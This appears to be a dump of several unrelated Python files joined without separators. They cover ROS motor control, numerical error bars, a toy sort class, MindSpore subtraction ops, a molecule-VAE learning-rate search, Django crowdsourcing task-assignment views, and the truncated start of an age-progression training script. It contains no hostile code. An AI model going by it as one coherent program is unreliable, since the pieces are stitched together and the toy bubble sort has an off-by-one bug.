#! /usr/bin/env python
import rospy
import serial
from geometry_msgs.msg import Twist


class MotorControl(object):

    def __init__(self):
        self.port = rospy.get_param("~port", "/dev/ttyUSB0")
        self.baudrate = long(rospy.get_param("~baud", "115200"))
        self.cmdTopic = rospy.get_param("~cmd_topic", "cmd_vel")
        self.wheelSep = float(rospy.get_param("~wheel_separation", "0.46"))
        self.wheelRad = float(rospy.get_param("~wheel_radius", "0.08255"))
        try:
            self.serial = serial.Serial(self.port, self.baudrate, timeout=10)
            rospy.loginfo("Connect to port: " + self.port + " success!!")
        except Exception as e:
            rospy.logerr("Cannot connect to port: " + self.port)
            rospy.logerr("Error: " + str(e))
        self.sub_cmd = rospy.Subscriber(
            self.cmdTopic, Twist, self.cmdvelCB, queue_size=10)
        self.goal_trans_x = 0.0
        self.goal_rotat_z = 0.0
        self.vel_wheel_l = 0.0
        self.vel_wheel_r = 0.0

    @staticmethod
    def constrain(value, value_min, value_max):
        return max(min(value_max, value), value_min)

    def cmdvelCB(self, msg):
        self.goal_trans_x = msg.linear.x
        self.goal_rotat_z = msg.angular.z
        WL = (self.goal_trans_x - self.wheelSep / 2.0 * self.goal_rotat_z) / self.wheelRad
        WR = -(self.goal_trans_x + self.wheelSep / 2.0 * self.goal_rotat_z) / self.wheelRad
        lWL = self.constrain(int(WL * 10) & 0xFF, 0, 255)
        lWR = self.constrain(int(WR * 10) & 0xFF, 0, 255)
        command = [255, lWR, lWL, 254]
        if self.serial != None:
            self.serial.write(command)


if __name__ == "__main__":
    try:
        rospy.init_node("test_motor_protocal")
        rospy.loginfo("Eleven test motor controller ...")
        robot = MotorControl()
        while not rospy.is_shutdown():
            try:
                if robot.serial.readable():
                    try:
                        if robot.serial.read() == b'\xff':
                            byte = ord(robot.serial.read())
                            vel_wheel_r = (256 - byte) * (-1 / 10.0) if byte > 127 else byte / 10.0
                            byte = ord(robot.serial.read())
                            vel_wheel_l = (256 - byte) * (-1 / 10.0) if byte > 127 else byte / 10.0
                            robot.serial.read()
                            robot.vel_wheel_l = vel_wheel_l
                            robot.vel_wheel_r = vel_wheel_r
                            comm = ">>> {}, {}".format(robot.vel_wheel_r, robot.vel_wheel_l)
                            rospy.loginfo(comm)
                    except Exception:
                        pass
            except KeyboardInterrupt:
                pass
    except rospy.ROSInterruptException:
        pass


import sys
import math


class Datapoints(object):

    def __init__(self, data=None):
        self._values = {}
        self._deviations = {}
        if data is not None:
            self.addData(data)

    def addDatapoint(self, param, value, dev):
        self._values[param] = value
        self._deviations[param] = dev

    def addData(self, data):
        for param in data.iterkeys():
            self[param] = data[param]

    def params(self):
        return self._values.iterkeys()

    def values(self):
        return DictView(self._values)

    def deviations(self):
        return DictView(self._deviations)

    def __getitem__(self, param):
        return self._values[param], self._deviations[param]

    def __setitem__(self, param, datapoint):
        value, deviation = datapoint
        self.addDatapoint(param, value, deviation)

    def __iter__(self):
        for param in self.params():
            value, deviation = self[param]
            yield param, value, deviation


class DictView(object):

    def __init__(self, data):
        self.data = data

    def __getitem__(self, index):
        return self.data[index]


def ErrorBars(f, data):
    deviations = (CalcDeviation(f, data, p) for p in data.params())
    result = math.fsum(dev ** 2 for dev in deviations)
    return math.sqrt(result)


def CalcDeviation(f, data, parameter):
    derivative = CalcDerivative(f, data, parameter)
    return derivative * data._deviations[parameter]


# Used in CalcDerivative to calculate the optimal value of h.
InitH = math.pow(sys.float_info.epsilon, 1.0 / 3)


def CalcDerivative(f, data, parameter):
    paramValue = data._values[parameter]
    # Numerical differentiation via two-sided difference quotient
    # Special thanks to
    # Paper: http://www.karenkopecky.net/Teaching/eco613614/Notes_NumericalDifferentiation.pdf
    hPrime = InitH * max(abs(paramValue), 1)
    h = ((paramValue + hPrime) - (paramValue - hPrime)) / 2
    rightValue = ModifyAndExecute(f, data, parameter, paramValue + h)
    leftValue = ModifyAndExecute(f, data, parameter, paramValue - h)
    return (rightValue - leftValue) / (2 * h)


def ModifyAndExecute(f, data, param, paramValue):
    origValue = data._values[param]
    data._values[param] = paramValue
    retVal = f(data.values())
    data._values[param] = origValue
    return retVal


agancsos/pythontestClass.py
#!/bin/python
import random


class MYCLASS:
    id = ""
    title = ""
    text = ""

    def __init__(self):
        self.id = int(random.random() * 999999)
        self.title = "DEFAULT"
        self.text = "DEFAULT"

    def pad(self, string, length, char):
        i = len(string)
        final = ""
        while i <= length:
            final += char
            i += 1
        return string + final

    def printReg(self):
        print self.pad(str(self.id), 20, " "), self.pad(self.title, 20, " "), self.pad(self.text, 40, " ")


def sort(list):
    n = len(list)
    swapped_flag = 1
    while swapped_flag != 0:
        swapped_flag = 0
        i = 1
        while i < n - 1:
            if list[i - 1].id > list[i].id:
                temp = list[i - 1]
                list[i - 1] = list[i]
                list[i] = temp
                swapped_flag = 1
            i += 1  # advance the index; without this the inner loop never terminates
        n = n - 1
    return list


##int main
temp_class = MYCLASS()
class_array = []
i = 0
while i < 10:
    class_array.append(MYCLASS())
    i += 1

print "Before: "
print temp_class.pad("ID", 20, " "), temp_class.pad("TITLE", 20, " "), temp_class.pad("TEXT", 40, " ")
print temp_class.pad("=", 80, "=")
for objects in class_array:
    objects.printReg()
print temp_class.pad("=", 80, "=")

class_array = sorted(class_array, key=lambda key: key.id)

print "After: "
print temp_class.pad("ID", 20, " "), temp_class.pad("TITLE", 20, " "), temp_class.pad("TEXT", 40, " ")
print temp_class.pad("=", 80, "=")
for objects in class_array:
    objects.printReg()
print temp_class.pad("=", 80, "=")


# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Implementation for internal polymorphism `sub` operations."""
from ...composite import base
from ... import functional as F

sub = base.MultitypeFuncGraph("sub")
"""
`sub` is a metafuncgraph object which will compute the subtraction of two objects
using ".register" decorator.
"""


@sub.register("Number", "Number")
def _sub_scalar(x, y):
    """Returns x - y where x and y are all scalars."""
    return F.scalar_sub(x, y)


@sub.register("Tensor", "Tensor")
def _sub_tensor(x, y):
    """Returns x - y where x and y are all tensors."""
    return F.tensor_sub(x, y)


@sub.register("Number", "Tensor")
def _scalar_sub_tensor(x, y):
    """Returns x - y where x is a scalar and y is a tensor.
    x and y should have same dtype."""
    return F.tensor_sub(x, y)


@sub.register("Tensor", "Number")
def _tensor_sub_scalar(x, y):
    """Returns x - y where x is a tensor and y is a scalar.
    x and y should have same dtype."""
    return F.tensor_sub(x, y)


1-10
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 4 12:06:24 2018

@author:
Based off: https://github.com/kanojikajino/grammarVAE
Paper: https://arxiv.org/abs/1703.01925
"""
from time import time
import numpy as np
from generateData import H5DataGenV2, getCacheSize
from GVAE import smilesGVAE
from findLR_CLR import LRFinder

if __name__ == "__main__":
    k = 25000
    gpus = 1
    pth = 'data/6MZincHV2/'  # for data
    fn = f'data/FindLR_{int(time())}'  # for model save
    print('Path:', pth)
    print('Model save:', fn)
    n = getCacheSize(pth)
    indices = np.arange(n)
    idTrain = indices[0:k]
    idValid = indices[k:k+4000]
    idTest = indices[k+4000:k+6000]
    batch = 256 * gpus
    genr = H5DataGenV2(idTrain, batch, pth=pth)
    vgenr = H5DataGenV2(idValid, batch, pth=pth)
    tstgen = H5DataGenV2(idTest, 2000, pth=pth)
    XTE, _tmp = tstgen.__getitem__(0)
    del _tmp, tstgen
    params = {
        'LATENT': 56,
        'nC': 3,
        'nD': 3,
        'beta': 1.0,
        'gruf': 501,
        'ngpu': gpus,
        'opt': 'SGD',
        'wFile': None
    }
    EPO = 2
    lr_finder = LRFinder(min_lr=2.0e-4, max_lr=1.0e-2,
                         steps_per_epoch=np.ceil(k/batch), epochs=EPO)
    sgv = smilesGVAE(**params)
    print('Training autoencoder.')
    if sgv.mgm is None:
        sgv.aen.fit_generator(generator=genr, validation_data=vgenr,
                              use_multiprocessing=False,
                              callbacks=[lr_finder], epochs=EPO)
    else:
        sgv.mgm.fit_generator(generator=genr, validation_data=vgenr,
                              use_multiprocessing=False,
                              callbacks=[lr_finder], epochs=EPO)
    lr_finder.plot_loss()
    lr_finder.plot_lr()


from django.core.files import locks
from django.core.urlresolvers import reverse
from django.db.models import Count, F, Q, Min
from django.template import RequestContext, TemplateDoesNotExist
from django.template.loader import get_template, select_template
from django.utils import timezone
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_GET, require_POST
from django.http import HttpResponse, Http404, HttpResponseBadRequest

from datetime import datetime
from base64 import b64encode
import pytz
import json
import os
import logging
import random
import uuid
import numpy as np

from basecrowd.interface import CrowdRegistry
from basecrowd.models import TaskGroupRetainerStatus
from basecrowd.models import RetainerPoolStatus
from basecrowd.tasks import gather_answer

logger = logging.getLogger('crowd_server')


@require_POST
@csrf_exempt
def create_task_group(request, crowd_name):
    """ See README.md for API. """
    # get the interface implementation from the crowd name.
    interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name)

    # Response dictionaries
    correct_response = {'status': 'ok'}
    wrong_response = {'status': 'wrong'}

    # Parse information contained in the URL
    json_dict = request.POST.get('data')

    # Validate the format.
    if not interface.validate_create_request(json_dict):
        wrong_response['reason'] = 'Invalid request data.'
        return HttpResponse(json.dumps(wrong_response))

    # Pull out important data fields
    json_dict = json.loads(json_dict)
    configuration = json_dict['configuration']
    group_id = json_dict['group_id']
    group_context = json.dumps(json_dict['group_context'])
    content = json_dict['content']
    point_identifiers = content.keys()

    # Create a new group for the tasks.
    if model_spec.group_model.objects.filter(group_id=group_id).exists():
        wrong_response['reason'] = 'Group id %s is already in use.'
% group_id return HttpResponse(json.dumps(wrong_response)) current_group = model_spec.group_model( group_id=group_id, tasks_finished=0, callback_url=configuration['callback_url'], group_context=group_context, crowd_config=json.dumps(configuration.get(crowd_name, {})), global_config=json.dumps(configuration)) # Call the group hook function, then save the new group to the database. interface.group_pre_save(current_group) current_group.save() # Build crowd tasks from the group if 'retainer_pool' in configuration: # Retainer pool tasks # The specified crowd must support retainer pools retainer_pool_model = model_spec.retainer_pool_model if not retainer_pool_model: wrong_response['reason'] = 'Crowd does not support retainer pools.' return HttpResponse(json.dumps(wrong_response)) # Create or find the retainer pool. retainer_config = configuration['retainer_pool'] create_pool = retainer_config['create_pool'] pool_id = retainer_config.get('pool_id', '') if create_pool: (retainer_pool, created) = retainer_pool_model.objects.get_or_create( external_id=pool_id, defaults={ 'capacity': retainer_config['pool_size'], 'status': RetainerPoolStatus.RECRUITING, }) if created == False: # pool id already taken wrong_response['reason'] = 'Pool id %s already in use' % pool_id return HttpResponse(json.dumps(wrong_response)) else: try: retainer_pool = retainer_pool_model.objects.get( external_id=pool_id) # TODO: Make sure this pool is compatible with the new task group except retainer_pool_model.DoesNotExist: # clean up current_group.delete() wrong_response['reason'] = 'Pool %s does not exist' % pool_id return HttpResponse(json.dumps(wrong_response)) current_group.retainer_pool = retainer_pool # Don't call interface.create_task, the `post_retainer_tasks` celery # task will do so. # Batch and create the tasks. batch_size = configuration['task_batch_size'] for i in range(0, len(point_identifiers), batch_size): batch_point_ids = point_identifiers[i:i+batch_size] batch_content = { j: content[j] for j in batch_point_ids } task_id = str(uuid.uuid4()) # generate a random id for this task task = model_spec.task_model( task_type=configuration['task_type'], data=json.dumps(batch_content), create_time=timezone.now(), task_id=task_id, group=current_group, num_assignments=configuration['num_assignments'], is_retainer=True, ) interface.task_pre_save(task) task.save() #for point_id, point_content in content.iteritems(): # task_id = str(uuid.uuid4()) # generate a random id for this task # task = model_spec.task_model( # task_type=configuration['task_type'], # data=json.dumps({point_id: point_content}), # create_time=pytz.utc.localize(datetime.now()), # task_id=task_id, # group=current_group, # num_assignments=configuration['num_assignments'], # is_retainer=True, # ) # interface.task_pre_save(task) # task.save() # start the work right away if the pool is ready if retainer_pool.status in [RetainerPoolStatus.IDLE, RetainerPoolStatus.ACTIVE]: current_group.retainer_pool_status = TaskGroupRetainerStatus.RUNNING retainer_pool.status = RetainerPoolStatus.ACTIVE retainer_pool.save() else: current_group.retainer_pool_status = TaskGroupRetainerStatus.WAITING current_group.save() else: # Not retainer, create a task for each batch of points. 
for i in range(0, len(point_identifiers), configuration['task_batch_size']): # build the batch current_content = {} for j in range(i, i + configuration['task_batch_size']): if j >= len(point_identifiers): break current_content[point_identifiers[j]] = content[ point_identifiers[j]] current_content = json.dumps(current_content) # Call the create task hook current_task_id = interface.create_task(configuration, current_content) # Build the task object current_task = model_spec.task_model( task_type=configuration['task_type'], data=current_content, create_time=pytz.utc.localize(datetime.now()), task_id=current_task_id, group=current_group, num_assignments=configuration['num_assignments']) # Call the pre-save hook, then save the task to the database. interface.task_pre_save(current_task) current_task.save() return HttpResponse(json.dumps(correct_response)) # Delete all tasks from the system. def purge_tasks(request, crowd_name): interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) tasks = model_spec.task_model.objects.all() # Call the delete hook, then delete the tasks from our database. # TODO: clean up retainer pool tasks correctly. interface.delete_tasks(tasks) tasks.delete() return HttpResponse('ok') # we need this view to load in AMT's iframe, so disable Django's built-in # clickjacking protection. @xframe_options_exempt @require_GET def get_assignment(request, crowd_name): # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) logger.info('Non-retainer worker requested task assignment.') # get assignment context context = interface.get_assignment_context(request) try: interface.require_context( context, ['task_id', 'is_accepted'], ValueError('Task id unavailable in assignment request context.')) except ValueError: # This task is no longer available (due to a race condition). # Return the 'No available tasks' template. template = get_scoped_template(crowd_name, 'unavailable.html') return HttpResponse(template.render(RequestContext(request, {}))) return _get_assignment(request, crowd_name, interface, model_spec, context) def _get_assignment(request, crowd_name, interface, model_spec, context, **custom_template_context): # Retrieve the task based on task_id from the database try: current_task = (model_spec.task_model.objects .select_related('group') .get(task_id=context['task_id'])) task_group = current_task.group except model_spec.task_model.DoesNotExist: response_str = '''

Error: Expired Task!

Task %s has expired, and isn't currently available for work. Please return this task and pick up a new one.

''' % context['task_id'] return HttpResponse(response_str) # Save the information of this worker worker_id = context.get('worker_id') if worker_id: try: current_worker = model_spec.worker_model.objects.get( worker_id=worker_id) except model_spec.worker_model.DoesNotExist: current_worker = model_spec.worker_model( worker_id=worker_id) # Call the pre-save hook, the save to the database interface.worker_pre_save(current_worker) current_worker.save() else: current_worker = None is_accepted = context.get('is_accepted', False) # If this is a retainer task, add the worker to the pool (if the worker # isn't already in the pool, i.e., they're trying to accept multiple HITs # for the same pool). if current_task.task_type == 'retainer': # TODO: consider making this all pools (i.e., a worker can't be in # more than one pool at a time). pool = task_group.retainer_pool if ((pool.active_workers.filter(worker_id=worker_id).exists() or pool.reserve_workers.filter(worker_id=worker_id).exists()) and (current_worker.assignments.filter( task__group__retainer_pool=pool, task__task_type='retainer') .exclude(task=current_task).exists())): response_str = '''

Error: Multiple pool memberships detected

You can't accept more than one retainer task at a time, and we've detected that you are already active in another retainer task.

Please return this task, or leave the pool in your other active task.

Note: You may see this error if you have recently finished another retainer task. In that case, simply wait 5-10 seconds and refresh this page, and the error should be gone.

''' return HttpResponse(response_str) global_config = json.loads(task_group.global_config) retainer_config = global_config['retainer_pool'] exp_config = global_config.get('experimental') churn_thresh = exp_config.get('churn_threshold') if exp_config else None context.update({ 'waiting_rate': retainer_config['waiting_rate'], 'per_task_rate': retainer_config['task_rate'], 'min_required_tasks': retainer_config['min_tasks_per_worker'], 'pool_status': pool.get_status_display(), }) # Relate workers and tasks (after a worker accepts the task). if is_accepted: if not current_worker: raise ValueError("Accepted tasks must have an associated worker.") assignment_id = context['assignment_id'] try: assignment = current_worker.assignments.get(assignment_id=assignment_id) except model_spec.assignment_model.DoesNotExist: assignment = model_spec.assignment_model.objects.create( assignment_id=assignment_id, worker=current_worker, task=current_task) # Add the new worker to the session task's retainer pool. if current_task.task_type == 'retainer': # Put the worker on reserve if the pool is full and we're churning if pool.active_workers.count() >= pool.capacity and churn_thresh is not None: assignment.on_reserve = True else: assignment.on_reserve = False current_worker.pools.add(pool) assignment.save() context.update({ 'wait_time': assignment.time_waited, 'tasks_completed': current_worker.completed_assignments_for_pool_session( current_task).count(), 'understands_retainer': current_worker.understands_retainer, }) else: if not current_task.group.work_start_time: current_task.group.work_start_time = timezone.now() current_task.group.save() # Add task data to the context. content = json.loads(current_task.data) group_context = json.loads(task_group.group_context) crowd_config = json.loads(task_group.crowd_config) context.update(group_context=group_context, content=content, backend_submit_url=interface.get_backend_submit_url(), frontend_submit_url=interface.get_frontend_submit_url(crowd_config), crowd_name=crowd_name) context.update(**custom_template_context) # Load the template and render it. template = get_scoped_template(crowd_name, current_task.task_type + '.html', context=context) return HttpResponse(template.render(RequestContext(request, context))) def get_scoped_template(crowd_name, template_name, context=None): base_template_name = os.path.join(crowd_name, 'base.html') if context is not None: try: t = get_template(base_template_name) except TemplateDoesNotExist: base_template_name = 'basecrowd/base.html' context['base_template_name'] = base_template_name return select_template([ os.path.join(crowd_name, template_name), os.path.join('basecrowd', template_name)]) # When workers submit assignments, we should send data to this view via AJAX # before submitting to AMT. @require_POST @csrf_exempt def post_response(request, crowd_name): # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) # get context from the request context = interface.get_response_context(request) # validate context interface.require_context( context, ['assignment_id', 'task_id', 'worker_id', 'answers'], ValueError("Response context missing required keys.")) # Check if this is a duplicate response assignment_id = context['assignment_id'] if model_spec.assignment_model.objects.filter( assignment_id=assignment_id, finished_at__isnull=False).exists(): return HttpResponse('Duplicate!') # Retrieve the task and worker from the database based on ids. 
current_task = model_spec.task_model.objects.get(task_id=context['task_id']) assignment = model_spec.assignment_model.objects.get(assignment_id=assignment_id) # Store this response into the database assignment.content = context['answers'] assignment.finished_at = timezone.now() interface.response_pre_save(assignment) assignment.save() # Check if this task has been finished # If we've gotten too many responses, ignore. if (not current_task.is_complete and (current_task.assignments.filter(finished_at__isnull=False).count() >= current_task.num_assignments)): current_task.is_complete = True current_task.pre_celery = timezone.now() current_task.save() gather_answer.delay(current_task.task_id, model_spec) # terminate in progress retainer tasks (model_spec.assignment_model.objects .exclude(task__task_type='retainer') .filter(task=current_task, finished_at__isnull=True) .update(finished_at=timezone.now(), terminated=True)) return HttpResponse('ok') # AJAX call succeded. # Views related to Retainer Pool tasks ####################################### @require_POST @csrf_exempt def ping(request, crowd_name): try: interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) now = timezone.now() # get and validate context context = interface.get_response_context(request) interface.require_context( context, ['task_id', 'worker_id', 'assignment_id'], ValueError("ping context missing required keys.")) task = model_spec.task_model.objects.get(task_id=context['task_id']) worker = model_spec.worker_model.objects.get(worker_id=context['worker_id']) assignment = model_spec.assignment_model.objects.get( assignment_id=context['assignment_id']) pool_status = task.group.retainer_pool.get_status_display() terminate_work = False terminate_worker = assignment.worker_released_at is not None # update waiting time ping_type = request.POST['ping_type'] # Task started waiting, create a new session if ping_type == 'starting': assignment.finish_waiting_session() # Task is waiting, increment wait time. elif ping_type == 'waiting' and pool_status != 'finished': last_ping = assignment.last_ping time_since_last_ping = (now - last_ping).total_seconds() assignment.time_waited_session += time_since_last_ping # Task is working, verify that the assignment hasn't been terminated. elif ping_type == 'working': active_task_id = request.POST.get('active_task', None) if not active_task_id: logger.warning('Ping from %s, but no active task id.' % assignment) terminate_worker = False # Don't kill them if we don't know what they're working on else: try: active_assignment = model_spec.assignment_model.objects.filter( worker=worker, task_id=active_task_id)[0] if active_assignment.terminated: terminate_work = True except IndexError: # No active assignment terminate_worker = False # Don't kill the worker if we don't know what they're working on. 
# if terminate_worker: # make sure their current task can be recycled # active_assignment.finished_at = now # active_assignment.terminated = True # active_assignment.save() assignment.last_ping = now assignment.save() worker.last_ping = now worker.save() logger.info('ping from worker %s, task %s' % (worker, task)) retainer_config = json.loads(task.group.global_config)['retainer_pool'] data = { 'ping_type': ping_type, 'wait_time': assignment.time_waited, 'tasks_completed': worker.completed_assignments_for_pool_session( task).count(), 'pool_status': pool_status, 'waiting_rate': retainer_config['waiting_rate'], 'per_task_rate': retainer_config['task_rate'], 'min_required_tasks': retainer_config['min_tasks_per_worker'], 'terminate_work': terminate_work, 'terminate_worker': terminate_worker, } return HttpResponse(json.dumps(data), content_type='application/json') except Exception as e: logger.exception(e) raise e @require_GET def assign_retainer_task(request, crowd_name): try: # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) context = interface.get_response_context(request) interface.require_context( context, ['task_id', 'worker_id'], ValueError("retainer assignment context missing required keys.")) try: task = (model_spec.task_model.objects .select_related('group__retainer_pool') .get(task_id=context['task_id'])) group = task.group pool = group.retainer_pool worker = model_spec.worker_model.objects.get(worker_id=context['worker_id']) logger.info('Retainer task %s requested work.' % task) except Exception: # Issue loading models from IDs, finish this assignment return HttpResponse(json.dumps({'start': False, 'pool_status': 'finished'}), content_type='application/json') exp_config = json.loads(group.global_config).get('experimental') if exp_config: straggler_mitigation = exp_config.get('mitigate_stragglers', False) straggler_routing_policy = exp_config.get('straggler_routing_policy', 'random') churn_threshold = exp_config.get('churn_threshold') else: straggler_mitigation = False churn_threshold = None # Acquire an exclusive lock to avoid duplicate assignments lockf = open('/tmp/ASSIGNMENT_LOCK', 'wb') logger.debug("Locking assignment lock...") locks.lock(lockf, locks.LOCK_EX) # Don't assign a task if the worker is on reserve or the pool is inactive. 
on_reserve = (task.assignments.filter(worker=worker, on_reserve=True).exists() if churn_threshold is not None else False) pool_inactive = pool.status not in (RetainerPoolStatus.ACTIVE, RetainerPoolStatus.REFILLING, RetainerPoolStatus.IDLE) no_work_response = HttpResponse(json.dumps({'start': False, 'pool_status': pool.get_status_display()}), content_type='application/json') if on_reserve: logger.info("Worker on reserve: not assigning work.") return no_work_response if pool_inactive: logger.info("Pool still recruiting or otherwise inactive: not assigning work.") return no_work_response # Look for a task the worker is already assigned to assignment_task = None existing_assignments = (worker.assignments .filter(finished_at__isnull=True) .filter(task__group__retainer_pool=pool) .exclude(task__task_type='retainer')) logger.info('Looking for assignments for retainer worker...') if existing_assignments.exists(): assignment_task = existing_assignments[0].task logger.info('Found an existing assignment for this worker') else: # Look for open tasks incomplete_tasks = ( # incomplete tasks model_spec.task_model.objects.filter(is_complete=False) # in this pool's tasks .filter(group__retainer_pool=pool) # that aren't dummy retainer tasks .exclude(task_type='retainer') # that the worker hasn't worked on already .exclude(assignments__worker=worker)) # First check if the open tasks haven't been assigned to enough workers. # TODO: avoid gross SQL non_terminated_assignments = """ SELECT COUNT(*) FROM %(crowdname)s_%(assignment_model)s WHERE %(crowdname)s_%(assignment_model)s.terminated = False AND %(crowdname)s_%(assignment_model)s.task_id = %(crowdname)s_%(task_model)s.task_id """ % { 'crowdname': crowd_name, 'assignment_model': model_spec.assignment_model.__name__.lower(), 'task_model': model_spec.task_model.__name__.lower(), } open_tasks = incomplete_tasks.extra( where=["num_assignments > (%s)" % non_terminated_assignments]) if open_tasks.exists(): logger.info('Found an unassigned but open task') assignment_task = open_tasks.order_by('?')[0] # Then, check if there in-progress tasks with enough assignments. elif incomplete_tasks.exists(): if not straggler_mitigation: # only assign tasks that have been abandoned # Bad performance characteristics! consider rewriting. active_workers = set(pool.active_workers.all()) abandoned_tasks = [ t for t in incomplete_tasks if len([a for a in t.assignments.select_related('worker').all() if a.worker in active_workers]) < t.num_assignments] if abandoned_tasks: logger.info('Found an assigned but abandoned task.') assignment_task = random.choice(abandoned_tasks) else: logger.info('All tasks are assigned.') # Straggler mitigation else: logger.info('Assigning to an active task for straggler mitigation with policy %s.' 
% straggler_routing_policy) if straggler_routing_policy == 'random': assignment_task = incomplete_tasks.order_by('?')[0] elif straggler_routing_policy == 'oldest': now = timezone.now() annotated = incomplete_tasks.annotate(start=Min('assignments__assigned_at')) weights = [(now - t.start).total_seconds() for t in annotated] weights = np.array(weights) / sum(weights) assignment_task = np.random.choice(list(annotated), size=1, p=weights)[0] elif straggler_routing_policy == 'young-workers': now = timezone.now() weights = [ 1 / (now - min([a.worker.assignments .filter(task__task_type='retainer', task__group__retainer_pool=pool) .order_by('assigned_at')[0].assigned_at for a in task.assignments.all()])).total_seconds() for task in incomplete_tasks] weights = np.array(weights) / sum(weights) assignment_task = np.random.choice(list(incomplete_tasks), size=1, p=weights)[0] elif straggler_routing_policy == 'fair': # assign to the task with the fewest assignments assignment_task = (incomplete_tasks .extra(select={'n_assignments': non_terminated_assignments}, order_by=['n_assignments']))[0] else: logger.info('Unkown straggler routing policy: %s. Using random instead...' % straggler_routing_policy) assignment_task = incomplete_tasks.order_by('?')[0] # return a url to the assignment if assignment_task: # create the assignment if necessary try: logger.info('Looking up assignment...') assignment = worker.assignments.get( task=assignment_task, worker=worker) if not assignment.retainer_session_task: assignment.retainer_session_task = task assignment.save() except model_spec.assignment_model.DoesNotExist: logger.info('No assignment found: creating new one.') assignment_id = str(uuid.uuid4()) assignment = model_spec.assignment_model.objects.create( assignment_id=assignment_id, worker=worker, task=assignment_task, retainer_session_task=task) if not assignment_task.group.work_start_time: assignment_task.group.work_start_time = timezone.now() assignment_task.group.save() url_args = { 'crowd_name': crowd_name, 'worker_id': worker.worker_id, 'task_id': assignment_task.task_id, } response_data = json.dumps({ 'start': True, 'task_url': reverse('basecrowd:get_retainer_assignment', kwargs=url_args), 'task_id': assignment_task.task_id, 'pool_status': pool.get_status_display() }) logger.info('Linking task to assignment.') return HttpResponse(response_data, content_type='application/json') else: logger.info('No tasks found!') return no_work_response except Exception as e: logger.exception(e) raise e finally: # Release the assignment lock--either an assignment has been created in the DB, or an error occurred. logger.debug("Unlocking assignment lock...") locks.unlock(lockf) lockf.close() # we need this view to load in AMT's iframe, so disable Django's built-in # clickjacking protection. @xframe_options_exempt @require_GET def get_retainer_assignment(request, crowd_name, worker_id, task_id): # get the interface implementation from the crowd name. interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) logger.info('Retainer worker fetched task assignment.') # fetch assignment if it already exists (e.g. the user refreshed the browser). 
try: assignment_id = model_spec.assignment_model.objects.get( task_id=task_id, worker_id=worker_id).assignment_id except model_spec.assignment_model.DoesNotExist: assignment_id = str(uuid.uuid4()) context = { 'task_id': task_id, 'worker_id': worker_id, 'is_accepted': True, 'assignment_id': assignment_id } return _get_assignment(request, crowd_name, interface, model_spec, context) @require_POST @csrf_exempt def finish_pool(request, crowd_name): pool_id = request.POST.get('pool_id') interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) try: pool = model_spec.retainer_pool_model.objects.get(external_id=pool_id) except model_spec.retainer_pool_model.DoesNotExist: return HttpResponse(json.dumps({'error': 'Invalid pool id'})) _finish_pool(pool, model_spec) logger.info("Retainer pool %s finished" % pool) return HttpResponse(json.dumps({'status': 'ok'})) def _finish_pool(pool, model_spec): # Mark open sessions as interrupted so we don't penalize them unfairly. (model_spec.assignment_model.objects .filter(task__group__retainer_pool=pool, task__task_type='retainer') .exclude(Q(finished_at__isnull=False) & Q(terminated=False)) .update(pool_ended_mid_assignment=True)) pool.status = RetainerPoolStatus.FINISHED pool.finished_at = timezone.now() pool.save() @require_POST @csrf_exempt def understands_retainer(request, crowd_name, worker_id): interface, model_spec = CrowdRegistry.get_registry_entry(crowd_name) try: worker = model_spec.worker_model.objects.get(worker_id=worker_id) except model_spec.worker_model.DoesNotExist: return HttpResponse(json.dumps({'error': 'Invalid worker id'})) worker.understands_retainer = True worker.save() logger.info('%s understands the retainer model.' % worker) return HttpResponse(json.dumps({'status': 'ok'})) import model import consts import logging import os import re import numpy as np import argparse import sys import random import datetime import torch from utils import * from torchvision.datasets.folder import pil_loader import gc import torch gc.collect() assert sys.version_info >= (3, 6),\ "This script requires Python >= 3.6" # TODO 3.7? assert tuple(int(ver_num) for ver_num in torch.__version__.split('.')) >= (0, 4, 0),\ "This script requires PyTorch >= 0.4.0" # TODO 0.4.1? def str_to_gender(s): s = str(s).lower() if s in ('m', 'man', '0'): return 0 elif s in ('f', 'female', '1'): return 1 else: raise KeyError("No gender found") def str_to_bool(s): s = s.lower() if s in ('true', 't', 'yes', 'y', '1'): return True elif s in ('false', 'f', 'no', 'n', 'o'): return False else: raise KeyError("Invalid boolean") if __name__ == '__main__': parser = argparse.ArgumentParser(description='AgeProgression on PyTorch.', formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('--mode', choices=['train', 'test'], default='train') # train params parser.add_argument('--epochs', '-e', default=1, type=int) parser.add_argument( '--models-saving', '--ms', dest='models_saving', choices=('always', 'last', 'tail', 'never'), default='always', type=str, help='Model saving preference.{br}' '\talways: Save trained model at the end of every epoch (default){br}' '\tUse this option if you have a lot of free memory and you wish to experiment with the progress of your results.{br}' '\tlast: Save trained model only at the end of the last epoch{br}' '\tUse this option if you don\'t have a lot of free memory and removing large binary files is a costly operation.{br}' '\ttail: "Safe-last". 
